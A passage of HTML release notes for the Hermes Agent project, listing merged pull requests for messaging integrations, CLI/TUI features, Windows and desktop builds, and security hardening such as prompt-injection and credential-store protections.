<li>Edit status messages in place instead of appending. (based on <a href="https://github.com/NousResearch/hermes-agent/pull/30141" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30141/hovercard">#30141</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/qike-ms/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/qike-ms">@qike-ms</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/30864" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30864/hovercard">#30864</a>)</li>
<li>Skip-STT audio path + 2GB cap via local Bot API server. (<a href="https://github.com/NousResearch/hermes-agent/pull/28541" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28541/hovercard">#28541</a>)</li>
<li>Route image documents (.png/.jpg/.webp/.gif) through vision pipeline. (<a href="https://github.com/NousResearch/hermes-agent/pull/28519" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28519/hovercard">#28519</a>)</li>
<li>Route audio file attachments away from STT pipeline. (<a href="https://github.com/NousResearch/hermes-agent/pull/28478" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28478/hovercard">#28478</a>)</li>
<li><code>disable_topic_auto_rename</code> gateway flag. (<a href="https://github.com/NousResearch/hermes-agent/pull/28523" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28523/hovercard">#28523</a>)</li>
<li><code>ignore_root_dm</code> config to drop messages without thread_id. (<a href="https://github.com/NousResearch/hermes-agent/pull/28536" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28536/hovercard">#28536</a>)</li>
<li>Chat-scoped auth without sender user_id. (<a href="https://github.com/NousResearch/hermes-agent/pull/28525" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28525/hovercard">#28525</a>)</li>
<li>Fail-closed auth fallback when <code>TELEGRAM_ALLOWED_USERS</code> is empty. (<a href="https://github.com/NousResearch/hermes-agent/pull/28494" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28494/hovercard">#28494</a>)</li>
<li>Roll over tool progress bubbles + scope audio_file_paths. (<a href="https://github.com/NousResearch/hermes-agent/pull/28482" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28482/hovercard">#28482</a>)</li>
<li>Avoid duplicate text after auto-TTS voice replies. (<a href="https://github.com/NousResearch/hermes-agent/pull/28509" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28509/hovercard">#28509</a>)</li>
<li>Mark final voice reply notify-worthy so Telegram delivers it audibly. (<a href="https://github.com/NousResearch/hermes-agent/pull/28504" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28504/hovercard">#28504</a>)</li>
</ul>
<h3>Discord</h3>
<ul>
<li>Recover Windows voice opus decoding. (<a href="https://github.com/NousResearch/hermes-agent/pull/33182" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33182/hovercard">#33182</a>)</li>
<li><code>allow_any_attachment</code> config to accept arbitrary file types. (<a href="https://github.com/NousResearch/hermes-agent/pull/27245" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27245/hovercard">#27245</a>)</li>
<li>Transcribe native voice notes. (<a href="https://github.com/NousResearch/hermes-agent/pull/28993" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28993/hovercard">#28993</a>)</li>
<li>Define UI view classes after lazy install. (<a href="https://github.com/NousResearch/hermes-agent/pull/28817" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28817/hovercard">#28817</a>)</li>
</ul>
<h3>Signal / Matrix / Feishu / Slack / WeCom</h3>
<ul>
<li>Signal: <code>require_mention</code> filter for group chats. (<a href="https://github.com/NousResearch/hermes-agent/pull/28574" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28574/hovercard">#28574</a>)</li>
<li>Matrix: warn on clock-skew silent message drops. (<a href="https://github.com/NousResearch/hermes-agent/pull/27330" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27330/hovercard">#27330</a>)</li>
<li>Matrix E2EE installs full dep set; plugins respect <code>is_connected</code>. (<a href="https://github.com/NousResearch/hermes-agent/pull/31688" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/31688/hovercard">#31688</a>)</li>
<li>Feishu: require webhook auth secret + honor config extras. (<a href="https://github.com/NousResearch/hermes-agent/pull/30746" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30746/hovercard">#30746</a>)</li>
<li>Feishu: enforce auth and chat binding for approval buttons. (<a href="https://github.com/NousResearch/hermes-agent/pull/30744" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30744/hovercard">#30744</a>)</li>
<li>Slack: socket recovery + Windows restart dedupe. (<a href="https://github.com/NousResearch/hermes-agent/pull/28873" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28873/hovercard">#28873</a>)</li>
<li>WeCom: safe-parse untrusted XML. (<a href="https://github.com/NousResearch/hermes-agent/pull/32442" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32442/hovercard">#32442</a>)</li>
</ul>
<h3>DingTalk / Webhooks / Microsoft Graph</h3>
<ul>
<li>DingTalk: transcribe native voice notes. (<a href="https://github.com/NousResearch/hermes-agent/pull/28993" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28993/hovercard">#28993</a>)</li>
<li>Webhook: enforce <code>INSECURE_NO_AUTH</code> safety rail on dynamic route reloads. (<a href="https://github.com/NousResearch/hermes-agent/pull/30863" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30863/hovercard">#30863</a>)</li>
<li>Webhook: restrict default toolset capabilities. (<a href="https://github.com/NousResearch/hermes-agent/pull/30745" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30745/hovercard">#30745</a>)</li>
<li>Microsoft Graph: harden webhook auth requirements. (<a href="https://github.com/NousResearch/hermes-agent/pull/30169" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30169/hovercard">#30169</a>)</li>
</ul>
<hr>
<h2>🖥️ CLI &amp; TUI</h2>
<h3>CLI</h3>
<ul>
<li><code>/update</code> slash command in CLI and TUI. (<a href="https://github.com/NousResearch/hermes-agent/pull/23854" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23854/hovercard">#23854</a>)</li>
<li>Update auto-rollback when post-pull syntax check fails. (<a href="https://github.com/NousResearch/hermes-agent/pull/28669" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28669/hovercard">#28669</a>)</li>
<li><code>--branch</code> flag for <code>hermes update</code>. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jquesnelle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jquesnelle">@jquesnelle</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/29591" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29591/hovercard">#29591</a>)</li>
<li><code>/exit --delete</code> flag to remove session on quit. (salvage of <a href="https://github.com/NousResearch/hermes-agent/pull/17665" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17665/hovercard">#17665</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/27101" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27101/hovercard">#27101</a>)</li>
<li><code>▶ N</code> indicator in status bar for running <code>/background</code> tasks. (<a href="https://github.com/NousResearch/hermes-agent/pull/27175" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27175/hovercard">#27175</a>)</li>
<li>Live background terminal-process count in status bar. (<a href="https://github.com/NousResearch/hermes-agent/pull/32061" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32061/hovercard">#32061</a>)</li>
<li>Append session recap to <code>/status</code> output. (salvage of <a href="https://github.com/NousResearch/hermes-agent/pull/18587" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/18587/hovercard">#18587</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/27176" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27176/hovercard">#27176</a>)</li>
<li>Configurable paste-collapse thresholds (TUI + CLI). (salvage <a href="https://github.com/NousResearch/hermes-agent/pull/29723" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29723/hovercard">#29723</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/32087" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32087/hovercard">#32087</a>)</li>
<li><code>/resume</code> accepts position numbers. (<a href="https://github.com/NousResearch/hermes-agent/pull/31709" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/31709/hovercard">#31709</a>)</li>
<li>Bring tool-call display back — verbose mode, specific failure reasons, todo progress. (<a href="https://github.com/NousResearch/hermes-agent/pull/31293" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/31293/hovercard">#31293</a>)</li>
<li>Validate runtime token refresh in Qwen auth status. (<a href="https://github.com/NousResearch/hermes-agent/pull/31196" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/31196/hovercard">#31196</a>)</li>
</ul>
<h3>TUI</h3>
<ul>
<li><strong>TUI session orchestrator</strong> — multiple live sessions in one TUI window. (salvages <a href="https://github.com/NousResearch/hermes-agent/pull/27642" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27642/hovercard">#27642</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/32980" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32980/hovercard">#32980</a>)</li>
<li><code>mouse_tracking</code> DEC mode presets. (salvage of <a href="https://github.com/NousResearch/hermes-agent/pull/26681" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26681/hovercard">#26681</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/30084" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30084/hovercard">#30084</a>)</li>
<li>Termux scrollback preservation + touch-friendly defaults. (<a href="https://github.com/NousResearch/hermes-agent/pull/28910" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28910/hovercard">#28910</a>)</li>
<li>Full assistant text in scrollback (no history truncation). (<a href="https://github.com/NousResearch/hermes-agent/pull/28829" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28829/hovercard">#28829</a>)</li>
<li>Preserve scrollback when branching sessions. (<a href="https://github.com/NousResearch/hermes-agent/pull/30162" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30162/hovercard">#30162</a>)</li>
<li>Preserve Python dunder identifiers in markdown. (<a href="https://github.com/NousResearch/hermes-agent/pull/28582" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28582/hovercard">#28582</a>)</li>
<li>Active profile shown in TUI prompt. (<a href="https://github.com/NousResearch/hermes-agent/pull/28581" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28581/hovercard">#28581</a>)</li>
<li>Improve Charizard completion menu contrast. (<a href="https://github.com/NousResearch/hermes-agent/pull/28346" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28346/hovercard">#28346</a>)</li>
<li>Stop slash dropdown chopping last char of <code>/goal</code>. (<a href="https://github.com/NousResearch/hermes-agent/pull/31311" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/31311/hovercard">#31311</a>)</li>
<li>Clipboard copy on linux/wayland. (<a href="https://github.com/NousResearch/hermes-agent/pull/29342" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29342/hovercard">#29342</a>)</li>
<li>Anchor <code>splitReasoning</code> unclosed-tag regex; stop eating last paragraph. (<a href="https://github.com/NousResearch/hermes-agent/pull/29426" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29426/hovercard">#29426</a>)</li>
<li>Surface verbose tool details. (<a href="https://github.com/NousResearch/hermes-agent/pull/30225" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30225/hovercard">#30225</a>)</li>
<li>Load Linux skills on Termux + salvage <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/adybag14-cyber/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/adybag14-cyber">@adybag14-cyber</a>'s Termux gates. (<a href="https://github.com/NousResearch/hermes-agent/pull/30166" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30166/hovercard">#30166</a>)</li>
<li>Handle images with codex app-server. (<a href="https://github.com/NousResearch/hermes-agent/pull/31220" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/31220/hovercard">#31220</a>)</li>
<li>Refresh virtual transcript on viewport resize. (<a href="https://github.com/NousResearch/hermes-agent/pull/31077" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/31077/hovercard">#31077</a>)</li>
<li>Ignore late thinking deltas after completion. (<a href="https://github.com/NousResearch/hermes-agent/pull/31055" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/31055/hovercard">#31055</a>)</li>
<li>Commit composer input bursts immediately. (<a href="https://github.com/NousResearch/hermes-agent/pull/31053" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/31053/hovercard">#31053</a>)</li>
<li>Log parent gateway lifecycle exits. (<a href="https://github.com/NousResearch/hermes-agent/pull/31051" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/31051/hovercard">#31051</a>)</li>
<li>Clear TTS env var on voice off + TTS indicator in status bar. (<a href="https://github.com/NousResearch/hermes-agent/pull/30987" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30987/hovercard">#30987</a>)</li>
<li>Pass <code>--expose-gc</code> as node argv instead of NODE_OPTIONS. (<a href="https://github.com/NousResearch/hermes-agent/pull/29998" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29998/hovercard">#29998</a>)</li>
<li>Align composer cursorLayout with wrap-ansi to kill multiline cursor drift. (<a href="https://github.com/NousResearch/hermes-agent/pull/27489" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27489/hovercard">#27489</a>)</li>
<li>Harden Terminal.app rendering and color paths. (<a href="https://github.com/NousResearch/hermes-agent/pull/27251" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27251/hovercard">#27251</a>)</li>
<li>Keep <code>/goal</code> verdict out of compact status row. (<a href="https://github.com/NousResearch/hermes-agent/pull/27971" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27971/hovercard">#27971</a>)</li>
<li>Clamp curses color 8 for 8-color terminals (Docker). (<a href="https://github.com/NousResearch/hermes-agent/pull/30260" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30260/hovercard">#30260</a>)</li>
</ul>
<hr>
<h2>🔒 Security &amp; Reliability</h2>
<h3>Promptware &amp; memory hardening</h3>
<ul>
<li><strong>Promptware defense</strong> — shared threat patterns + memory load-time scan + tool-result delimiters. (<a href="https://github.com/NousResearch/hermes-agent/pull/32269" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32269/hovercard">#32269</a>)</li>
<li>Expand memory content scanning patterns to parity with skills guard. (<a href="https://github.com/NousResearch/hermes-agent/pull/9151" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/9151/hovercard">#9151</a>)</li>
<li>Harden Skills Guard multi-word prompt patterns. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/YLChen-007/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/YLChen-007">@YLChen-007</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/26852" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26852/hovercard">#26852</a>)</li>
<li>Split cron scanner so skill prose stops false-positiving exfil patterns. (<a href="https://github.com/NousResearch/hermes-agent/pull/32339" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32339/hovercard">#32339</a>)</li>
</ul>
<h3>File safety</h3>
<ul>
<li>Protect Hermes control-plane files from prompt injection (<code>auth.json</code>, <code>config.yaml</code>, <code>webhook_subscriptions.json</code>, <code>mcp-tokens/</code>). (salvages <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PratikRai0101/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PratikRai0101">@PratikRai0101</a>'s <a href="https://github.com/NousResearch/hermes-agent/pull/14157" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/14157/hovercard">#14157</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/30397" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30397/hovercard">#30397</a>)</li>
<li>Write-deny <code>&lt;root&gt;/.env</code> when running under a profile. (<a href="https://github.com/NousResearch/hermes-agent/pull/29687" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29687/hovercard">#29687</a>)</li>
<li>Defense-in-depth read-deny on credential stores. (salvages <a href="https://github.com/NousResearch/hermes-agent/pull/17659" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17659/hovercard">#17659</a> + <a href="https://github.com/NousResearch/hermes-agent/pull/8055" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8055/hovercard">#8055</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/30721" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30721/hovercard">#30721</a>)</li>
<li>TTS <code>output_path</code> traversal + update ZIP symlink reject. (salvage <a href="https://github.com/NousResearch/hermes-agent/pull/6693" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6693/hovercard">#6693</a> + <a href="https://github.com/NousResearch/hermes-agent/pull/15881" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15881/hovercard">#15881</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/32056" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32056/hovercard">#32056</a>)</li>
<li>Reject symlinked audio inputs. (<a href="https://github.com/NousResearch/hermes-agent/pull/10082" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/10082/hovercard">#10082</a>)</li>
</ul>
<h3>Credential safety</h3>
<ul>
<li>Avoid persisting borrowed credential secrets — runtime env-sourced keys no longer leak into <code>auth.json</code>. (<a href="https://github.com/NousResearch/hermes-agent/pull/31416" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/31416/hovercard">#31416</a>)</li>
<li>Validate Nous Portal <code>inference_base_url</code> against host allowlist. (salvages <a href="https://github.com/NousResearch/hermes-agent/pull/27612" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27612/hovercard">#27612</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/30611" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30611/hovercard">#30611</a>)</li>
<li>Harden API server key placeholder handling. (<a href="https://github.com/NousResearch/hermes-agent/pull/30738" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30738/hovercard">#30738</a>)</li>
<li>Harden Google Chat OAuth credential persistence. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Zyrixtrex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Zyrixtrex">@Zyrixtrex</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/24788" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/24788/hovercard">#24788</a>)</li>
<li>xAI OAuth: pin inference <code>base_url</code> to x.ai origin. (<a href="https://github.com/NousResearch/hermes-agent/pull/28952" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28952/hovercard">#28952</a>)</li>
<li>Quarantine dead OAuth tokens on terminal refresh failure (xAI, Codex, MiniMax). (<a href="https://github.com/NousResearch/hermes-agent/pull/28116" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28116/hovercard">#28116</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/28118" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28118/hovercard">#28118</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/28119" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28119/hovercard">#28119</a>)</li>
</ul>
<h3>Supply-chain</h3>
<ul>
<li><strong>On-demand supply-chain audit via OSV.dev</strong> — <code>hermes audit</code>. (<a href="https://github.com/NousResearch/hermes-agent/pull/31460" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/31460/hovercard">#31460</a>)</li>
<li><code>hermes update</code> syntax-validates critical files post-pull, auto-rollback on failure. (<a href="https://github.com/NousResearch/hermes-agent/pull/28669" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28669/hovercard">#28669</a>)</li>
<li>Quarantine <code>hermes.exe</code> vs concurrent Windows instance. (<a href="https://github.com/NousResearch/hermes-agent/pull/26677" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26677/hovercard">#26677</a>)</li>
</ul>
<h3>Other hardening</h3>
<ul>
<li>Restrict default webhook toolset capabilities. (<a href="https://github.com/NousResearch/hermes-agent/pull/30745" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30745/hovercard">#30745</a>)</li>
<li>Harden Microsoft Graph webhook auth requirements. (<a href="https://github.com/NousResearch/hermes-agent/pull/30169" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30169/hovercard">#30169</a>)</li>
<li>Require source CIDR allowlisting for public msgraph webhook binds. (<a href="https://github.com/NousResearch/hermes-agent/pull/33722" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33722/hovercard">#33722</a>)</li>
<li>Require <code>API_SERVER_KEY</code> before dispatching API server work. (<a href="https://github.com/NousResearch/hermes-agent/pull/33232" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33232/hovercard">#33232</a>)</li>
<li>env_passthrough: apply GHSA-rhgp-j443-p4rf filter to config.yaml path. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roadhero/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roadhero">@roadhero</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/27794" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27794/hovercard">#27794</a>)</li>
<li>Dashboard + WeCom: restrict markdown link schemes; safe-parse untrusted XML. (<a href="https://github.com/NousResearch/hermes-agent/pull/32442" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32442/hovercard">#32442</a>)</li>
<li>Salvage project-plugin RCE bypass fix from PR <a href="https://github.com/NousResearch/hermes-agent/pull/29311" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29311/hovercard">#29311</a> (GHSA-5qr3-c538-wm9j). (<a href="https://github.com/NousResearch/hermes-agent/pull/30837" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30837/hovercard">#30837</a>)</li>
<li>Cross-profile soft guard on file-write tools + system-prompt hint. (<a href="https://github.com/NousResearch/hermes-agent/pull/31290" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/31290/hovercard">#31290</a>)</li>
<li>Reject unsafe tar members in Android psutil compatibility installer. (<a href="https://github.com/NousResearch/hermes-agent/pull/33742" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33742/hovercard">#33742</a>)</li>
<li>Reject non-regular tar members during tirith auto-install. (<a href="https://github.com/NousResearch/hermes-agent/pull/33786" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33786/hovercard">#33786</a>)</li>
</ul>
<hr>
<h2>🪟 Native Windows (Beta Continued)</h2>
<ul>
<li>Thin desktop installer + first-launch <code>install.ps1</code> bootstrap. (<a href="https://github.com/NousResearch/hermes-agent/pull/27822" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27822/hovercard">#27822</a>)</li>
<li>Complete Windows bootstrap — <code>dep_ensure</code> + <code>install.ps1</code> + detection. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alt-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alt-glitch">@alt-glitch</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/27845" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27845/hovercard">#27845</a>)</li>
<li><code>install.ps1</code>: strip BOM, <code>-Commit</code>/<code>-Tag</code> pin params, harden git ops. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jquesnelle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jquesnelle">@jquesnelle</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/28169" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28169/hovercard">#28169</a>)</li>
<li>Consolidate ACP browser bootstrap into <code>install.{sh,ps1}</code>. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alt-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alt-glitch">@alt-glitch</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/27851" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27851/hovercard">#27851</a>)</li>
<li><code>hermes update</code> quarantines live <code>hermes.exe</code>. (<a href="https://github.com/NousResearch/hermes-agent/pull/26677" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26677/hovercard">#26677</a>)</li>
<li>Discord voice opus decoding on Windows. (<a href="https://github.com/NousResearch/hermes-agent/pull/33182" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33182/hovercard">#33182</a>)</li>
<li>Windows Docker Desktop compatible compose file. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sunil123135/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sunil123135">@Sunil123135</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/31031" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/31031/hovercard">#31031</a>)</li>
</ul>
<hr>
<h2>🖼️ Hermes Desktop GUI</h2>
<ul>
<li><code>hermes gui</code> launcher — install + build + launch packaged Electron app. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/30165" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30165/hovercard">#30165</a>)</li>
<li>Desktop UI lift. (<a href="https://github.com/NousResearch/hermes-agent/pull/27227" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27227/hovercard">#27227</a>)</li>
<li><code>nix</code> package <code>.#desktop</code>. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethernet8023/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethernet8023">@ethernet8023</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/28964" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28964/hovercard">#28964</a>)</li>
<li>Hardened Slack socket recovery + Windows desktop restart dedupe. (<a href="https://github.com/NousResearch/hermes-agent/pull/28873" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28873/hovercard">#28873</a>)</li>
